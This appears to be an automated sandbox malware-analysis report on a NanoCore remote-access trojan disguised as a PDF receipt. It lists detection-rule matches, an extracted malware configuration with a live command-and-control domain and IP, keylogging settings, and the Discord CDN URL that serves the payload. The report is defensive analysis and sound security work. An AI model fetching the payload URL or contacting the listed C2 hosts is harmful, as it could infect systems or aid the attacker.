18.2.dhcpmon.exe.40e016e.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x6483:$x2: NanoCore.ClientPluginHost 0x1a020:$x2: NanoCore.ClientPluginHost 0x32ad7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x6561:$s4: PipeCreated 0x1b0fb:$s4: PipeCreated 0x33bb2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x649d:$s5: IClientLoggingHost 0x1a03a:$s5: IClientLoggingHost 0x32af1:$s5: IClientLoggingHost
18.2.dhcpmon.exe.40e016e.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.dhcpmon.exe.40e016e.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x6483:$a: NanoCore 0x64cd:$a: NanoCore 0x66b7:$a: NanoCore 0x19fd6:$a: NanoCore 0x19feb:$a: NanoCore 0x1a020:$a: NanoCore 0x32a8d:$a: NanoCore 0x32aa2:$a: NanoCore 0x32ad7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x621c:$b: ClientPlugin 0x648c:$b: ClientPlugin 0x64d6:$b: ClientPlugin 0x19d92:$b: ClientPlugin
0.0.eReceiptpdf.exe.5144460.25.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.0.eReceiptpdf.exe.5144460.25.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.0.eReceiptpdf.exe.5144460.25.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.0.eReceiptpdf.exe.5144460.25.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
18.2.dhcpmon.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
18.2.dhcpmon.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
18.2.dhcpmon.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.dhcpmon.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.0.eReceiptpdf.exe.810000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
12.0.dhcpmon.exe.b30000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
18.0.dhcpmon.exe.d40000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
0.0.eReceiptpdf.exe.5144460.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.0.eReceiptpdf.exe.5144460.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.0.eReceiptpdf.exe.5144460.11.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.0.eReceiptpdf.exe.5144460.11.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
18.2.dhcpmon.exe.d40000.1.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
0.0.eReceiptpdf.exe.dc0000.15.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
12.2.dhcpmon.exe.b30000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x2420b:$x1: https://cdn.discordapp.com/attachments/
18.2.dhcpmon.exe.40ea9e1.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28264:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28291:$x2: IClientNetworkHost
18.2.dhcpmon.exe.40ea9e1.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28264:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2933f:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x2827e:$s5: IClientLoggingHost
18.2.dhcpmon.exe.40ea9e1.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.0.eReceiptpdf.exe.5144460.11.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.0.eReceiptpdf.exe.5144460.11.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.0.eReceiptpdf.exe.5144460.11.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.0.eReceiptpdf.exe.5144460.11.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
18.2.dhcpmon.exe.40e4fab.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1646:$x1: NanoCore.ClientPluginHost 0x151e3:$x1: NanoCore.ClientPluginHost 0x2dc9a:$x1: NanoCore.ClientPluginHost 0x15210:$x2: IClientNetworkHost 0x2dcc7:$x2: IClientNetworkHost
18.2.dhcpmon.exe.40e4fab.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1646:$x2: NanoCore.ClientPluginHost 0x151e3:$x2: NanoCore.ClientPluginHost 0x2dc9a:$x2: NanoCore.ClientPluginHost 0x1724:$s4: PipeCreated 0x162be:$s4: PipeCreated 0x2ed75:$s4: PipeCreated 0x1660:$s5: IClientLoggingHost 0x151fd:$s5: IClientLoggingHost 0x2dcb4:$s5: IClientLoggingHost
18.2.dhcpmon.exe.40e4fab.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.dhcpmon.exe.40e4fab.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1646:$a: NanoCore 0x1690:$a: NanoCore 0x187a:$a: NanoCore 0x15199:$a: NanoCore 0x151ae:$a: NanoCore 0x151e3:$a: NanoCore 0x2dc50:$a: NanoCore 0x2dc65:$a: NanoCore 0x2dc9a:$a: NanoCore 0x13df:$b: ClientPlugin 0x164f:$b: ClientPlugin 0x1699:$b: ClientPlugin 0x14f55:$b: ClientPlugin 0x14f70:$b: ClientPlugin 0x14fa0:$b: ClientPlugin 0x151b7:$b: ClientPlugin 0x151ec:$b: ClientPlugin 0x2da0c:$b: ClientPlugin 0x2da27:$b: ClientPlugin 0x2da57:$b: ClientPlugin 0x2dc6e:$b: ClientPlugin
Click to see the 58 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d49cd953-2518-4f4a-81ab-2e5bbd26", "Group": "kings", "Domain1": "zeegod.duckdns.org", "Domain2": "", "Port": 8655, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

ReversingLabs: Detection: 22%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR

Source: eReceiptpdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49718 version: TLS 1.0

Source: eReceiptpdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbI/ source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.Xml.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.pdbMZ@ source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: 1}\Servererver32dows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb(1 source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.Configuration.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdble}i source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: .pdb& source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Users\user\Desktop\eReceiptpdf.exeisualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Servererver32)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUT source: eReceiptpdf.exe, 00000000.00000000.304724116.0000000007830000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdb source: WER6061.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER6061.tmp.dmp.11.dr
Source:	Binary string: C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
Source:	Binary string: jVisualBasic.pdb< source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
Source:	Binary string: System.ni.pdb source: WER6061.tmp.dmp.11.dr

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 4x nop then add dword ptr [ebp-5Ch], 01h	0_2_01660659
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 4x nop then jmp 01661155h	0_2_01660F18
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_01669324
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_01669330
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Code function: 4x nop then jmp 01661155h	0_2_01660F09
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then add dword ptr [ebp-5Ch], 01h	12_2_02DE0659
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then jmp 02DE1155h	12_2_02DE0F18
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	12_2_02DE9330
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	12_2_02DE9324
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then jmp 02DE1155h	12_2_02DE0F09

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49716 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49717 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49721 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49724 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49725 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49726 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49730 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49765 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49774 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49776 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49793 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49802 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49804 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49805 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49806 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49807 -> 45.133.1.211:8655
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49808 -> 45.133.1.211:8655

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: zeegod.duckdns.org

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: zeegod.duckdns.org

Source: Joe Sandbox View

ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.134.233 162.159.134.233

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49718 version: TLS 1.0

Source: global traffic

TCP traffic: 192.168.2.3:49716 -> 45.133.1.211:8655

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: eReceiptpdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: eReceiptpdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: eReceiptpdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: eReceiptpdf.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: eReceiptpdf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: eReceiptpdf.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: eReceiptpdf.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: eReceiptpdf.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: eReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dhcpmon.exe, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmp, eReceiptpdf.exe	String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: Amcache.hve.11.dr	String found in binary or memory: http://upx.sf.net
Source: eReceiptpdf.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: eReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: dhcpmon.exe, eReceiptpdf.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg
Source: eReceiptpdf.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
